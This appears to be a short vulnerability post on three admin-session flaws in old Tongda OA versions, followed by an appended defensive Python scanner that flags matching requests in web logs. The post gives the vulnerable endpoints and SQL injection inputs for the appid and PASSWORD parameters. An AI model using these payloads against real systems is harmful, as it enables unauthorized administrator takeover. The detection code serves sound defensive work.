Tongda injection 0day
2022-07-07 07:35:00 【Immortal fish】
Older versions of the Tongda application:
Vulnerability 1:
The vulnerability is located at:
/ispirit/login_code_check.php?codeuid=
An attacker can obtain the administrator session.
Python script:
None
Root cause: the old version allows unauthorized access.
Vulnerability 2:
Vulnerable location:
pda/appcenter/submenu.php?appid=11+and+pow(999,1)
The appid parameter is injectable, which can be used to obtain administrator sessions.
Vulnerability 3:
Vulnerable location:
logincheck.php
UNAME=admin&PASSWORD='&encode_type=1
The password parameter is injectable, which can be used to obtain administrator sessions.
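A defensive check for the three request patterns listed above, added here as an example that is not part of the original post: it scans web-server log lines for requests matching them. The log format, the rule that a legitimate appid is a plain integer, and the sample lines are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed log format (assumption): ip "METHOD URL" status "request-body"
LINE = re.compile(r'(\S+) "(\S+) (\S+)" (\d{3}) "(.*)"')

def classify(url, body=""):
    """Return a finding label for one request, or None if no rule matches."""
    parts = urlsplit(url)
    path = parts.path.lower()
    query = parse_qs(parts.query, keep_blank_values=True)
    # Vulnerability 1: any request carrying codeuid is flagged for review.
    if path.endswith("/ispirit/login_code_check.php") and "codeuid" in query:
        return "vuln1: login_code_check.php called with codeuid"
    # Vulnerability 2: assumes a legitimate appid is a plain integer.
    if path.endswith("/pda/appcenter/submenu.php") and "appid" in query:
        if not re.fullmatch(r"\d+", query["appid"][0]):
            return "vuln2: non-numeric appid"
    # Vulnerability 3: quote or backslash in PASSWORD (query string or body).
    if path.endswith("/logincheck.php"):
        form = parse_qs(body, keep_blank_values=True)
        password = (form.get("PASSWORD") or query.get("PASSWORD") or [""])[0]
        if re.search(r"['\"\\]", password):
            return "vuln3: quote character in PASSWORD"
    return None

def scan(lines):
    """Return [(ip, finding)] for every log line that matches a rule."""
    hits = []
    for line in lines:
        m = LINE.fullmatch(line.strip())
        if m:
            ip, _method, url, _status, body = m.groups()
            finding = classify(url, body)
            if finding:
                hits.append((ip, finding))
    return hits

# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '192.0.2.10 "GET /ispirit/login_code_check.php?codeuid=" 200 ""',
    '203.0.113.5 "GET /pda/appcenter/submenu.php?appid=11+and+pow(999,1)" 200 ""',
    '203.0.113.6 "GET /pda/appcenter/submenu.php?appid=11" 200 ""',
    '198.51.100.7 "POST /logincheck.php" 200 "UNAME=admin&PASSWORD=%27&encode_type=1"',
    '198.51.100.8 "POST /logincheck.php" 200 "UNAME=admin&PASSWORD=hunter2&encode_type=1"',
]

if __name__ == "__main__":
    for ip, finding in scan(SAMPLE):
        print(ip, finding)
```

Most access logs do not record request bodies, so the PASSWORD rule needs a reverse proxy or WAF log that does.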